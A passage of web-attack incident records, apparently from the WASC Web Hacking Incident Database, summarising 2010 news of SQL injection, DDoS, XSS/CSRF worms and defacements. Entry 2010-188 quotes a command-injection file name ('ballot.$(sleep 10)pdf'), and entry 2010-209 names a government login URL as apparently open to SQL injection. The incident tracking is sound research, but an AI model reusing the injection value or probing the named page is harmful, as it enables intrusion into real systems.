Entry Title: WHID 2010-209: Hacker may have accessed DHH database
WHID ID: 2010-209
Date Occured: 9/17/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: Baton Rouge, LA
Incident Description: Department of Health and Hospitals spokeswoman Lisa Faust said Bureau of Emergency Medical Services personnel discovered the database breach. The unauthorized entry gave the hacker access to an individual’s name and personal information, including Social Security numbers. “What we don’t know is whether the hacker was able to access any information,” Faust said. A computer screen displayed the message “You have been hacked,” Faust said. “Since we don’t know one way or the other we sent notices out to 56,000 people that there’s a potential that the information was compromised.” WASC WHID Note - the portal login page (https://ems.oph.dhh.la.gov/ems/login.asp) looks vulnerable to SQL Injection.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.2theadvocate.com/news/105946193.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-208: BoingBoing hacked and defaced
WHID ID: 2010-208
Date Occured: 10/27/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Blogs
Attacked Entity Geography: Toronto, CA
Incident Description: BoingBoing.net, the popular blog and "directory of wonderful things", has been hacked and its home page replaced with a message containing vulgar language and pictures. The site was pulled down by the administrators shortly after the attack, which is suspected to have been executed via an SQL injection, TechCrunch reports.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.net-security.org/secworld.php?id=10062
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-207: MWEB gets hacked
WHID ID: 2010-207
Date Occured: 10/25/2010
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Hosting Providers
Attacked Entity Geography: Lusaka, South Africa
Incident Description: The login details of over 2,000 MWEB Business account-holders have been published online by a hacker. The hacker published details such as usernames, passwords, line speeds and subscriber names on a mailing list archive, MyBroadband reported. Affected companies include Bloomberg, Volvo SA, Caledon Hotel Casino, Peugeot SA and Radio 786. UPDATE: According to MWEB's Twitter account, fewer than 1,000 accounts have been affected. The ISP also said that the problem was with the Internet Solutions user interface.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://technology.iafrica.com/technews/682038.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-206: Tribal rights charity weathers DDoS assault
WHID ID: 2010-206
Date Occured: 10/28/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Politics
Attacked Entity Geography:
Incident Description: The publication of footage of Indonesian soldiers torturing native Papuans appears to have provoked a denial of service attack on the websites of development charities who hosted it. The websites of Survival International and at least five other organisations who work in West Papua were all floored by the attack, which started at around 5pm on Wednesday and increased in severity over the evening. Survival's site is currently back up even though the assault remains ongoing.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/10/28/survival_ddos_assault/
Attack Source Geography: London, England
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-205: Hackers plant Firefox 0day on Nobel Peace Prize website
WHID ID: 2010-205
Date Occured: 10/27/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Education
Attacked Entity Geography: Norway
Incident Description: Malicious hackers have exploited an unpatched vulnerability in the latest version of Firefox to attack people visiting the Nobel Peace Prize website, a Norway-based security firm said on Tuesday.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/10/26/firefox_0day_report/
Attack Source Geography: Taiwan
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-204: How bank hackers beat Barclays
WHID ID: 2010-204
Date Occured: 10/25/2010
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Fraud
Attacked Entity Field: Finance
Attacked Entity Geography: London, England
Incident Description: The Barclays hackers used their zero-day attack (or hack) to get round the security gate timers the bank's engineers had put in its website software. It was the hacking equivalent of sitting outside the bank in a Ford Cortina, and checking your watch every time the rent-a-cop does his rounds and the bank manager pops out for his lunch-time massage. Barclays thought it was prepared for this sort of reconnaissance, said Romain. The bank's security team had reviewed the software behind its website payment system and got everything ship-shape. They checked how their banking software handled internet transactions. Real people tend to fumble and faff about at their computers. It can take some old timers half a day just to enter their card number. Yet automated software bots designed by hackers can spit out instructions as fast as the bank computer will receive them. Software like this pretends to be a bank customer, but is far too efficient to be a real person at all.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.thinq.co.uk/2010/10/25/how-bank-hackers-beat-barclays/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-203: Confessed student hacker speaks
WHID ID: 2010-203
Date Occured: 10/25/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: London, Ontario, CA
Incident Description: An SQL database system is used to store information, such as passwords. Using an "SQL injection," he was able to log onto the site as an administrator. From there, he was able to upload files and to get the log-in information. "It let me see all the files on the servers, passwords, user names. They did not make any effort to hide it," he said of the school board's IT department.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.woodstocksentinelreview.com/ArticleDisplay.aspx?e=2815263
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-202: NASA Website hacked and serving malware/spam
WHID ID: 2010-202
Date Occured: 10/21/2010
Attack Method: Unknown
Application Weakness: Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: Phoenix, AZ
Incident Description: Some sites under NASA’s Jet Propulsion Laboratory ( http://jpl.nasa.gov/ ) have been hacked and are being used on the infamous blackhat SEO spam network. Not only that, but they are also serving malware to unsuspecting users.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/10/nasa-web-site-hacked-and-serving-malwarespam.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-201: Operation: Payback Hits SatelFilm.at with 'Drive By' DoS
WHID ID: 2010-201
Date Occured: 10/21/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: Wien, Austria
Incident Description: Operation: Payback apparently went on a preemptive strike, taking Satel Film by surprise and launching a 'drive by' DDoS (Distributed Denial of Service) attack. As of this writing, SatelFilm.at is offline.
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected: 1
Reference: http://www.slyck.com/story2097_Operation_Payback_Hits_SatelFilmat_with_Drive_By_DoS
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-200: Wikileaks Communications Infrastructure Attacked?
WHID ID: 2010-200
Date Occured: 10/21/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: News
Attacked Entity Geography: San Mateo, CA
Incident Description: According to sources in the hacking circuit familiar with the goings-on of Wikileaks, the organization is adopting a new server cluster to replace those that have come under the denial-of-service attack. The security breaches were not connected to the site restructuring that has brought it down for about two weeks, said a Wikileaks volunteer. Because the organization's staff members operate on the policy of "security through obscurity," insiders were not clear about the magnitude of or the parties behind the attack.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://cybersecurityreport.nextgov.com/2010/10/wikileaks_communications_infrastructure_attacked.php?oref=latest_posts
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-199: Cyber Attack Strikes FreedomWorks
WHID ID: 2010-199
Date Occured: 10/21/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Politics
Attacked Entity Geography: Washington, DC
Incident Description: A mysterious cyber attack apparently struck the computer servers at the pro-tea party group FreedomWorks this morning, just as it launched a major fund-raising drive. FreedomWorks officials are investigating, but they suspect they were attacked deliberately, perhaps by a political opponent seeking to thwart its fund-raising efforts. The attack crippled the site at about 9:45 a.m. just when the fund-raising drive was publicized on the radio by conservative talk show host Glenn Beck. The group estimates it lost about $80,000 in potential donations as it struggled to bring its site back online. An “autopsy” showed a highly sophisticated hacker struck at 6:55 a.m., the group said, setting the stage for the eventual meltdown. The server was wiped out, though group officials said no data was lost or stolen.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.wsj.com/washwire/2010/10/21/cyber-attack-strikes-freedomworks/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-198: Kaspersky download site hacked, redirecting users to fake AV
WHID ID: 2010-198
Date Occured: 10/17/2010
Attack Method: Known Vulnerability
Application Weakness: Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Technology
Attacked Entity Geography: Moscow, Russia
Incident Description: According to ITPro, the incident was first denied, then confirmed by Kaspersky. They say that they took the server offline as soon as they found out about the breach, that the compromise was caused by a vulnerability in a third party application for website administration and that customer details contained on company servers were not compromised.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.net-security.org/malware_news.php?id=1499
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-197: AmeriCorps Security Breach
WHID ID: 2010-197
Date Occured: 10/8/2010
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: Washington, DC
Incident Description: In order for personal data to have been exposed, someone would have had to manipulate the website address -- or know the individual's unique log-in name and use a certain technique to bypass password requirements, the letter said. The records may have shown names, addresses and social security numbers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://wiredworkplace.nextgov.com/2010/10/americorps_workers_personal_data_jeopardized-print.php
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-196: HK star Dicky Cheung's blog hacked
WHID ID: 2010-196
Date Occured: 10/19/2010
Attack Method: Abuse of Functionality
Application Weakness: Insufficient Password Recovery
Outcome: Disinformation
Attacked Entity Field: Entertainment
Attacked Entity Geography: Hong Kong
Incident Description: Even when the hoax was exposed, the hacker continued to boldly state in a post that he hacked Cheung's blog to test his skills. He claimed that "it took only a short while to retrieve a user's login information" before apologising for the matter and vanishing.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.channelnewsasia.com/stories/entertainment/view/1087981/1/.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-195: Anonymous DDoS on Gene Simmons' websites
WHID ID: 2010-195
Date Occured: 10/12/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: Beverly Hills, CA
Incident Description: Gene Simmons, frontman of the band KISS, is hardly impressed with the DDoS (Distributed Denial of Service) attack on GeneSimmons.com - and indirectly - SimmonsRecords.com. In fact, according to a news post made to his site yesterday, Gene is threatening legal action against the perpetrators, along with posting their names and pictures online.
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://www.slyck.com/story2088_Gene_Simmons_Directly_Threatens_Anonymous_With_Legal_Action_Jail_Time
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-194: Liberal Democrats website hijacked by tuition fees message
WHID ID: 2010-194
Date Occured: 10/18/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: UK
Incident Description: The website for the Liberal Democrats was hacked at the end of last week, with the front page redirecting to a YouTube protest about tuition fees.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.scmagazineuk.com/liberal-democrats-website-hijacked-by-tuition-fees-message/article/181149/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-193: IPO.gov.uk - Less than an Hour Until Attack Begins
WHID ID: 2010-193
Date Occured: 10/16/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: UK
Incident Description: So now the target of Anonymous is the IPO.gov.uk website - or the Intellectual Property Office. This is the first time Anonymous has targeted a government website, indicating a level of fearlessness considering the possible ramifications. As its name suggests, the IPO governs and helps protect copyrights and intellectual property in the United Kingdom.
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://www.slyck.com/story2087_IPOgovuk_Less_than_an_Hour_Until_Attack_Begins
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-192: SQL Injection Used to Deface Copyprotected, Others Might Follow
WHID ID: 2010-192
Date Occured: 10/16/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: However, Sean-Paul Correll of Panda Security doesn't agree with the "DNS cache poisoning" theory. According to him, the attack vector was SQL injection. "The original researcher assumed that the host of the hijacked site was not affiliated with the MPAA website, but we can see that the reported IP is hosting other MPAA related websites [cptwg.org, filmratings.com]," the researcher writes. Correll even points out exactly where the exploited SQL injection weakness was located and calls the flaw "rudimentary."
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://news.softpedia.com/news/SQL-Injection-Used-to-Deface-Copyprotected-Others-Might-Follow-161316.shtml
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-191: XSS Flaw Found on Secure American Express Site
WHID ID: 2010-191
Date Occured: 10/5/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field: Credit Card Issuer
Attacked Entity Geography: USA
Incident Description: A cross-site scripting (XSS) vulnerability has been identified on an American Express website secured with EV SSL and can be exploited to enhance phishing attacks. XSS weaknesses are the result of poor input validation into Web forms and allow attackers to return potentially malicious code to visitors' browsers. Ensuring proper validation of all inputs in Web applications, in order to prevent cross-site scripting and SQL injection vulnerabilities, is actually a requirement of the Payment Card Industry Data Security Standard (PCI-DSS).
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/XSS-Flaw-Found-on-Secure-American-Express-Site-159439.shtml
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-190: PayPal and eBay XSSed Again
WHID ID: 2010-190
Date Occured: 10/6/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: New cross-site scripting (XSS) vulnerabilities that can be leveraged to create very credible phishing attacks have been identified on PayPal and eBay. The PayPal XSS weakness was discovered by a Romanian security enthusiast using the online handle of d3v1l, who disclosed it on his blog.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/eBay-and-PayPal-XSSed-Again-159733.shtml
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://blogs.forbes.com/firewall/2010/10/06/hackable-bug-found-on-paypal-com/?partner=yahootix
Entry Title: WHID 2010-189: Copyright holder floored by DDoS flood
WHID ID: 2010-189
Date Occured: 10/7/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Entertainment
Attacked Entity Geography: Spain
Incident Description: Spain's copyright society (SGAE) came under attack by hacktivists from Anonymous on Thursday as part of the latest phase of a high-profile campaign against organisations that hassle file-sharers. A distributed denial of service attack, officially launched at midnight (Central European Time) on 7 October, crashed the organisation's website on Wednesday even before it officially began. The assault is a repeat of tactics previously used against the websites of the Recording Industry Association of America (RIAA), the Motion Picture Association of America (MPAA) and UK law firm ACS:Law, among others.
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/10/07/anonymous_ent_biz_ddos_hits_spain/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-188: Hackers hijack internet voting system in Washington DC
WHID ID: 2010-188
Date Occured: 10/6/2010
Attack Method: OS Commanding
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: The voting application was written on the Ruby on Rails framework and ran on top of the Apache web server and the MySQL database. The scientists were able to hijack the system after they discovered that they could upload ballots with almost any string they wanted. By inserting Unix commands into the file names, they were able to take “almost total control of the server software, including the ability to change votes and reveal voters' secret ballots,” Halderman said. A file named “ballot.$(sleep 10)pdf,” for instance, caused the server to pause for 10 seconds. They used similar techniques to install a backdoor on the system that allowed them almost unfettered system access.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/10/06/net_voting_hacked/
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-187: "Operation Payback" attacks to go on until "we stop being angry"
WHID ID: 2010-187
Date Occured: 9/30/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description: The distributed denial of service (DDoS) attacks against anti-piracy websites have gone on for a week now, with the lawyers behind the "US Copyright Group" being the latest target. And the anonymous Internet users behind "Operation Payback" aren't done acting out; in an interview yesterday with the security experts at Panda Labs, one of the organizers said that Anonymous' attacks will continue "until we stop being angry." Judging from the list of things that make him (?) angry, this could take a while. The law firm of Dunlap, Grubb and Weaver was one of the newest targets of the attacks, organized a week ago to take down anti-piracy organizations around the world. Already hit: the RIAA (US), BPI (UK), MPAA (US), AFACT (Australia), BREIN (Netherlands), Aiplex (India), and Websheriff (UK). One of the smaller sites actually yielded the biggest bounty; the UK "P2P settlement letter factory" ACS Law gave up several hundred megabytes of private e-mails after being taken offline by the attack.
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://arstechnica.com/tech-policy/news/2010/09/operation-payback-attacks-continue-until-we-stop-being-angry.ars
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-186: Foursquare Hacked by TechCrunch Editor Michael Arrington
WHID ID: 2010-186
Date Occured: 10/1/2010
Attack Method: Content Spoofing
Application Weakness: Abuse of Functionality
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Becoming "mayor" of a location is the most coveted status in Foursquare. To win this honor you have to check in to a location more than anyone else, and to do that you actually have to go there, since Foursquare won't let you check in remotely. But last night Techcrunch editor Michael Arrington punked Foursquare's API and made himself mayor of Facebook and Twitter headquarters, all without ever leaving his office. "A mischievous hacker friend of mine stepped in with a small script that he wrote that will check me in to any venue at all via the Foursquare API," Arrington wrote in a post on TechCrunch. "That means I don't have to spend time finding friends already where I want to be, and since we're using the API we can easily fake out the "you're not actually there" problem."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.observer.com/print/133727
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-185: Online hackers steal $600K from city of Brigantine's bank account
WHID ID: 2010-185
Date Occured: 10/1/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: New Jersey, USA
Incident Description: Computer hackers managed to steal $600,000 from a New Jersey shore town's bank account. Officials say $200,000 still hasn't been recovered. TD Bank notified Brigantine on Tuesday that multiple wire transfers had taken place from its account. Police say someone was able to get a user name and password. Authorities say a virus or a fake Web page set up to mimic the bank's real one might have been used to carry out the thefts.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.nj.com/news/index.ssf/2010/10/online_hackers_steal_600k_from.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-184: Microsoft warns of in-the-wild attacks on web app flaw
WHID ID: 2010-184
Date Occured: 9/21/2010
Attack Method: Brute Force
Application Weakness: Information Leakage
Outcome: Leakage of Information
Attacked Entity Field: Multiple
Attacked Entity Geography:
Incident Description: Attackers have begun exploiting a recently disclosed vulnerability in Microsoft web-development applications that opens password files and other sensitive data to interception and tampering. The vulnerability in the way ASP.Net apps encrypt data was disclosed last week at the Ekoparty Conference in Argentina. Microsoft on Friday issued a temporary fix for the so-called “cryptographic padding attack,” which allows attackers to decrypt protected files by sending vulnerable systems large numbers of corrupted requests. Now, Microsoft security pros say they are seeing “limited attacks” in the wild and warned that they can be used to read and tamper with a system's most sensitive configuration files.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/09/21/asp_dot_net_padding_oracle_fix/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-183: Don't blame DNS for Facebook outage, experts say
WHID ID: 2010-183
Date Occured: 9/27/2010
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Downtime
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Facebook gave little detail about the cause of the outage except to say that it was the result of a misconfiguration in one of its databases, which prompted a flood of traffic from an automated system trying to fix the error. "We made a change to a persistent copy of a configuration value that was interpreted as invalid," explained Robert Johnson in Facebook's blog post about the incident. "This meant that every single client saw the invalid value and attempted to fix it. Because the fix involves making a query to a cluster of databases, that cluster was quickly overwhelmed by hundreds of thousands of queries per second." The feedback loop created so much traffic that Facebook was forced to turn off the database cluster, which meant turning off the Web site. "Once the databases had recovered and the root cause had been fixed, we slowly allowed more people back onto the site," Johnson said. He added that "for now we've turned off the system that attempts to correct configuration values."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2010/09/27/urnidgns002570F3005978D8002577A9007EE871.DTL
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-182: Orkut Hit by XSS Worm
WHID ID: 2010-182
Date Occured: 9/26/2010
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: First Twitter was hacked. Then Facebook went down. Now it’s Orkut’s turn. Google’s social networking site has been attacked by the virulent “Bom Sabado” worm. Bom Sabado means “Good Saturday” in Portuguese, the native language of Brazil where the worm is thought to have originated. Orkut is the most popular social site in Brazil, India and several other countries. The worm replicates itself across accounts and randomly sends “Bom Sabado” messages to friends’ scrapbooks, Orkut’s version of Facebook’s wall. Google support recently announced that the worm had been contained and they are in the process of cleaning infected accounts. However, the company recommends vigilance when accessing accounts; users should be especially wary about clicking suspicious links.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.sitepoint.com/2010/09/26/orkut-bom-sabado-xss-worm/
Attack Source Geography:
Attacked System Technology: Orkut
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-181: Mass cyber attack paralyses Burmese media
WHID ID: 2010-181
Date Occured: 9/27/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: Burma
Incident Description: Websites belonging to The Irrawaddy magazine, Mizzima and DVB – all exiled media groups founded by former activists – were today attacked using DDoS, or distributed denial-of-service, which fires thousands of malformed web connections against the site.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.dvb.no/elections/mass-cyber-attack-paralyses-burmese-media/11932
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-180: Thousands of Websites Affected by Anonymous DDoS Attack Against AFACT
WHID ID: 2010-180
Date Occured: 9/28/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Multiple
Attacked Entity Geography:
Incident Description: The Distributed Denial of Service (DDoS) attack launched by Anonymous against the Australian Federation Against Copyright Theft (AFACT) yesterday has ended up affecting almost 8,000 unrelated websites. Operation Payback, the DDoS campaign led by Anonymous against anti-piracy groups and entertainment industry associations, is now over a week old. Since September 18th, when the coordinated attacks started, the group has hit websites belonging to the Motion Picture Association of America (MPAA), the Recording Industry Association of America (RIAA), the International Federation of the Phonographic Industry (IFPI), the British Phonographic Industry (BPI) and the Dutch Bescherming Rechten Entertainment Industrie Nederland (BREIN). Two UK-based law firms and an Indian company called Aiplex Software involved in anti-piracy efforts have also been attacked.
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Thousands-of-Websites-Affected-by-Anonymous-DDoS-Attack-Against-AFACT-158431.shtml
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-179: WTF worm makes Twitterers declare goat lust
WHID ID: 2010-179
Date Occured: 9/27/2010
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Another malicious worm hit Twitter over the weekend, days after the micro-blogging site reached near-meltdown from a technically similar attack. This time around the danger came from clicking links contained in micro-blogging messages beginning "WTF [URL]". Last week's more serious onMouseOver problem struck when users moved their mouse cursor over an infected tweet. These messages contained hidden JavaScript code that exploited a cross-site scripting problem - in the case of the WTF worm a CSRF (cross-site request forgery) technique is in play. The miscreants behind the latest assault set up an attack page that exploited a CSRF vulnerability in Twitter so that victims who clicked on a link posted a crude message about their supposed fondness for sex with goats, as explained in a blog post by Sophos here.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/09/27/twitter_wtf_worm/
Attack Source Geography:
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-178: New Mass Injection Attack Targets ASP Websites
WHID ID: 2010-178
Date Occured: 9/29/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Multiple
Attacked Entity Geography:
Incident Description: A gang of hackers infecting predominantly ASP and ASP.NET websites with malicious code has launched a new attack that has so far affected at least 1,500 domains. "A large number of sites have been hacked again in the last few days with a malware script pointing to google-stat50.info (and google-stats50.info)," David Dede of Web integrity monitoring vendor Sucuri Security warns. "Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few months ago," he adds. The robint.us mass injection took place at the beginning of June and got good coverage in the media because it affected the websites of the Wall Street Journal and the Jerusalem Post.
Mass Attack: Yes
Mass Attack Name: Mass SQL Injection Bots
Number of Sites Affected:
Reference: http://news.softpedia.com/news/New-Mass-Injection-Attack-Targets-ASP-Websites-158499.shtml
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-177: Japan Suspects Chinese Hackers Attacked Its Official Websites
WHID ID: 2010-177
Date Occured: 9/20/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: Japan
Incident Description: Japan views Chinese hackers as main suspects for Distributed Denial of Service (DDoS) attacks that affected several of its official websites last week. According to the Taipei Times, the Japanese government is investigating attacks directed at the Ministry of Defense and National Police Agency websites, between Wednesday and Friday. The largest known Chinese hacking group is suspected for launching the DDoS, because it made threats in this respect, following a recent maritime incident that led to a diplomatic conflict between the two countries.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Japan-Suspects-Chinese-Hackers-Attacked-Its-Official-Websites-157142.shtml
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-176: Cyber rally disrupts US recording industry website
WHID ID: 2010-176
Date Occured: 9/20/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: Reference WHID 2010-164: Company Paid to Launch DoS Attacks Against Torrent Sites. Computer security researchers have said that an unprecedented mass cyber protest was triggered by efforts by film and music trade groups to close online piracy haunts. Members of 4chan, an online forum that promotes users remaining anonymous, organized distributed denial-of-service (DDoS) attacks on websites for the Recording Industry Association of America (RIAA) and the Motion Picture Association of America (MPAA), according to the security firm PandaLabs. DDoS attacks are efforts to overload websites with so many simultaneous requests that computer servers can't handle the load and freeze or crash. Attacks on the RIAA caused dozens of interruptions in service, taking down the group's website for a total of one hour and 37 minutes, according to PandaLabs.
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://www.google.com/hostednews/afp/article/ALeqM5h7fm6cBhM33alDYD_1n4tTVHwXMw
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-175: Persistent XSS Bug on Twitter Being Exploited
